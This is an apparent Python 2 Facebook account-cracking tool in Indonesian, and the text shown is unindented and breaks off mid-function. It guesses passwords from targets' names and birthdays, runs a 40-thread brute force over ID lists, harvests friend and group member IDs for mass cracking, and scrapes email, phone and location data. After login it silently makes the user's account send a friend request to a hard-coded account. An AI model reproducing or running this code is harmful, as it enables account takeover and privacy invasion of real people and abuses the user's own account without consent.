# -\*- coding: utf-8 -\*-

import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize

from multiprocessing.pool import ThreadPool

try:

import mechanize

except ImportError:

os.system('pip2 install mechanize')

else:

try:

import requests

except ImportError:

os.system('pip2 install requests')

from requests.exceptions import ConnectionError

from mechanize import Browser

reload(sys)

sys.setdefaultencoding('utf8')

br = mechanize.Browser()

br.set\_handle\_robots(False)

br.set\_handle\_refresh(mechanize.\_http.HTTPRefreshProcessor(), max\_time=1)

br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]

def keluar():

print '\x1b[1;91m[!] Tutup'

os.sys.exit()

def jalan(z):

for e in z + '\n':

sys.stdout.write(e)

sys.stdout.flush()

time.sleep(0.01)

logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- \_ --\_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m\_-\_-- -\_ --\_\_ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - \_ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m\* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m The Magizz \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m\* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/TheMagizz\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m\* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/rizz.magizz\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[\*] Silahkan Login Operamini Agar Tidak Checkpoint\n'

def tik():

titik = [

'. ', '.. ', '... ']

for o in titik:

print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,

sys.stdout.flush()

time.sleep(0.01)

back = 0

threads = []

berhasil = []

cekpoint = []

gagal = []

idfriends = []

idfromfriends = []

idmem = []

id = []

em = []

emfromfriends = []

hp = []

hpfromfriends = []

reaksi = []

reaksigrup = []

komen = []

komengrup = []

listgrup = []

vulnot = '\x1b[31mNot Vuln'

vuln = '\x1b[32mVuln'

def login():

os.system('clear')

try:

toket = open('login.txt', 'r')

menu()

except (KeyError, IOError):

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'

id = raw\_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')

pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')

tik()

try:

br.open('https://m.facebook.com')

except mechanize.URLError:

print '\n\x1b[1;91m[!] Tidak Ada Koneksi'

keluar()

br.\_factory.is\_html = True

br.select\_form(nr=0)

br.form['email'] = id

br.form['pass'] = pwd

br.submit()

url = br.geturl()

if 'save-device' in url:

try:

sig = 'api\_key=882a8490361da98702bf97a021ddc14dcredentials\_type=passwordemail=' + id + 'format=JSONgenerate\_machine\_id=1generate\_session\_cookies=1locale=en\_USmethod=auth.loginpassword=' + pwd + 'return\_ssl\_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'

data = {'api\_key': '882a8490361da98702bf97a021ddc14d', 'credentials\_type': 'password', 'email': id, 'format': 'JSON', 'generate\_machine\_id': '1', 'generate\_session\_cookies': '1', 'locale': 'en\_US', 'method': 'auth.login', 'password': pwd, 'return\_ssl\_resources': '0', 'v': '1.0'}

x = hashlib.new('md5')

x.update(sig)

a = x.hexdigest()

data.update({'sig': a})

url = 'https://api.facebook.com/restserver.php'

r = requests.get(url, params=data)

z = json.loads(r.text)

zedd = open('login.txt', 'w')

zedd.write(z['access\_token'])

zedd.close()

print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'

requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access\_token=' + z['access\_token'])

time.sleep(1)

menu()

except requests.exceptions.ConnectionError:

print '\n\x1b[1;91m[!] Tidak Ada Koneksi'

keluar()

if 'checkpoint' in url:

print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'

os.system('rm -rf login.txt')

time.sleep(0.01)

keluar()

else:

print '\n\x1b[1;91m[!] Gagal Masuk'

os.system('rm -rf login.txt')

time.sleep(0.01)

login()

def menu():

try:

toket = open('login.txt', 'r').read()

except IOError:

os.system('clear')

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(0.01)

login()

else:

try:

otw = requests.get('https://graph.facebook.com/me?access\_token=' + toket)

a = json.loads(otw.text)

nama = a['name']

id = a['id']

ots = requests.get('https://graph.facebook.com/me/subscribers?access\_token=' + toket)

b = json.loads(ots.text)

sub = str(b['summary']['total\_count'])

except KeyError:

os.system('clear')

print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'

os.system('rm -rf login.txt')

time.sleep(0.01)

login()

except requests.exceptions.ConnectionError:

print logo

print '\x1b[1;91m[!] Tidak Ada Koneksi'

keluar()

os.system('clear')

print logo

print '\x1b[1;97m\xe2\x95\x94' + 50 \* '\xe2\x95\x90' + '╗'

print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) \* '\x1b[1;97m ' + '║'

print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) \* '\x1b[1;97m ' + '║'

print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) \* '\x1b[1;97m ' + '║'

print '\x1b[1;97m╠' + 50 \* '\xe2\x95\x90' + '╝'

print '║-> \x1b[1;37;40m1. User Information'

print '║-> \x1b[1;37;40m2. Hack Facebook Account'

print '║-> \x1b[1;37;40m3. Bot'

print '║-> \x1b[1;37;40m4. Others'

print '║-> \x1b[1;37;40m5. Update'

print '║-> \x1b[1;37;40m6. Logout'

print '║-> \x1b[1;31;40m0. Exit'

print '\x1b[1;37;40m║'

pilih()

def pilih():

zedd = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if zedd == '':

print '\x1b[1;91m[!] Can\'t empty'

pilih()

else:

if zedd == '1':

informasi()

else:

if zedd == '2':

menu\_hack()

else:

if zedd == '3':

menu\_bot()

else:

if zedd == '4':

lain()

else:

if zedd == '5':

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

os.system('git pull origin master')

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu()

else:

if zedd == '6':

os.system('rm -rf login.txt')

os.system('xdg-open https://m.facebook.com/rizz.magizz')

keluar()

else:

if zedd == '0':

keluar()

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'

pilih()

def informasi():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(0.01)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

id = raw\_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')

r = requests.get('https://graph.facebook.com/me/friends?access\_token=' + toket)

cok = json.loads(r.text)

for p in cok['data']:

if id in p['name'] or id in p['id']:

r = requests.get('https://graph.facebook.com/' + p['id'] + '?access\_token=' + toket)

z = json.loads(r.text)

print 52 \* '\x1b[1;97m\xe2\x95\x90'

try:

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']

except KeyError:

print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'

else:

try:

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']

except KeyError:

print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'

else:

try:

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']

except KeyError:

print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'

else:

try:

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile\_phone']

except KeyError:

print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'

try:

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']

except KeyError:

print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'

try:

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']

except KeyError:

print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'

try:

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '

for q in z['education']:

try:

print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']

except KeyError:

print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'

except KeyError:

pass

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu()

else:

print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu()

def menu\_hack():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(0.01)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'

print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'

print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'

print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'

print '║-> \x1b[1;37;40m5. Yahoo Clone'

print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'

print '║-> \x1b[1;31;40m0. Back'

print '\x1b[1;37;40m║'

hack\_pilih()

def hack\_pilih():

hack = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if hack == '':

print '\x1b[1;91m[!] Can\'t empty'

hack\_pilih()

else:

if hack == '1':

mini()

else:

if hack == '2':

crack()

hasil()

else:

if hack == '3':

super()

else:

if hack == '4':

brute()

else:

if hack == '5':

menu\_yahoo()

else:

if hack == '6':

grab()

else:

if hack == '0':

menu()

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'

hack\_pilih()

def mini():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(0.01)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[ INFO ] Target must be your friend !'

try:

id = raw\_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

r = requests.get('https://graph.facebook.com/' + id + '?access\_token=' + toket)

a = json.loads(r.text)

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']

jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')

time.sleep(1)

jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')

time.sleep(1)

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

pz1 = a['first\_name'] + '123'

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + id + '&locale=en\_US&password=' + pz1 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

y = json.load(data)

if 'access\_token' in y:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

if 'www.facebook.com' in y['error\_msg']:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

pz2 = a['first\_name'] + '12345'

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + id + '&locale=en\_US&password=' + pz2 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

y = json.load(data)

if 'access\_token' in y:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

if 'www.facebook.com' in y['error\_msg']:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

pz3 = a['last\_name'] + '123'

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + id + '&locale=en\_US&password=' + pz3 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

y = json.load(data)

if 'access\_token' in y:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

if 'www.facebook.com' in y['error\_msg']:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

lahir = a['birthday']

pz4 = lahir.replace('/', '')

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + id + '&locale=en\_US&password=' + pz4 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

y = json.load(data)

if 'access\_token' in y:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

if 'www.facebook.com' in y['error\_msg']:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

pz5 = ('sayang')

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + id + '&locale=en\_US&password=' + pz5 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

y = json.load(data)

if 'access\_token' in y:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

if 'www.facebook.com' in y['error\_msg']:

print '\x1b[1;91m[+] \x1b[1;92mFounded.'

print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

else:

print '\x1b[1;91m[!] Sorry, opening password target failed :('

print '\x1b[1;91m[!] Try other method.'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

except KeyError:

print '\x1b[1;91m[!] Terget not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

def crack():

global file

global idlist

global passw

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(0.01)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

idlist = raw\_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')

passw = raw\_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')

try:

file = open(idlist, 'r')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

for x in range(40):

zedd = threading.Thread(target=scrak, args=())

zedd.start()

threads.append(zedd)

for zedd in threads:

zedd.join()

except IOError:

print '\x1b[1;91m[!] File not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_hack()

def scrak():

global back

global berhasil

global cekpoint

global gagal

global up

try:

buka = open(idlist, 'r')

up = buka.read().split()

while file:

username = file.readline().strip()

url = 'https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + username + '&locale=en\_US&password=' + passw + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'

data = urllib.urlopen(url)

mpsh = json.load(data)

if back == len(up):

break

if 'access\_token' in mpsh:

bisa = open('Berhasil.txt', 'w')

bisa.write(username + ' | ' + passw + '\n')

bisa.close()

berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)

back += 1

else:

if 'www.facebook.com' in mpsh['error\_msg']:

cek = open('Cekpoint.txt', 'w')

cek.write(username + ' | ' + passw + '\n')

cek.close()

cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)

back += 1

else:

gagal.append(username)

back += 1

sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))

sys.stdout.flush()

except IOError:

print '\n\x1b[1;91m[!] Connection busy'

time.sleep(0.01)

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[\xe2\x9c\x96] No connection'

def hasil():

print

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for b in berhasil:

print b

for c in cekpoint:

print c

print

print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))

keluar()

def super():

global toket

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '║-> \x1b[1;37;40m1. Crack from Friends'

print '║-> \x1b[1;37;40m2. Crack from Group'

print '║-> \x1b[1;37;40m3. Crack from File'

print '║-> \x1b[1;31;40m0. Kembali'

print '\x1b[1;37;40m║'

pilih\_super()

def pilih\_super():

peak = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if peak == '':

print '\x1b[1;91m[!] Can\'t empty'

pilih\_super()

else:

if peak == '1':

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')

r = requests.get('https://graph.facebook.com/me/friends?access\_token=' + toket)

z = json.loads(r.text)

for s in z['data']:

id.append(s['id'])

else:

if peak == '2':

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

idg = raw\_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')

try:

r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access\_token=' + toket)

asw = json.loads(r.text)

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']

except KeyError:

print '\x1b[1;91m[!] Group not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

super()

re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access\_token=' + toket)

s = json.loads(re.text)

for i in s['data']:

id.append(i['id'])

else:

if peak == '3':

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

try:

idlist = raw\_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')

for line in open(idlist,'r').readlines():

id.append(line.strip())

except IOError:

print '\x1b[1;91m[!] File not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

super()

else:

if peak == '0':

menu\_hack()

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'

pilih\_super()

print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')

titik = ['. ', '.. ', '... ']

for o in titik:

print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,

sys.stdout.flush()

time.sleep(0.01)

print

print 52 \* '\x1b[1;97m\xe2\x95\x90'

def main(arg):

user = arg

try:

a = requests.get('https://graph.facebook.com/' + user + '/?access\_token=' + toket)

b = json.loads(a.text)

pass1 = b['first\_name'] + '123'

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + user + '&locale=en\_US&password=' + pass1 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

q = json.load(data)

if 'access\_token' in q:

print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']

else:

if 'www.facebook.com' in q['error\_msg']:

print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']

else:

pass2 = b['firs\_name'] + '12345'

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + user + '&locale=en\_US&password=' + pass2 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

q = json.load(data)

if 'access\_token' in q:

print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']

else:

if 'www.facebook.com' in q['error\_msg']:

print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']

else:

pass3 = b['last\_name'] + '123'

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + user + '&locale=en\_US&password=' + pass3 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

q = json.load(data)

if 'access\_token' in q:

print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']

else:

if 'www.facebook.com' in q['error\_msg']:

print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']

else:

pass4 = b['last\_name'] + '12345'

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + user + '&locale=en\_US&password=' + pass4 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

q = json.load(data)

if 'access\_token' in q:

print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']

else:

if 'www.facebook.com' in q['error\_msg']:

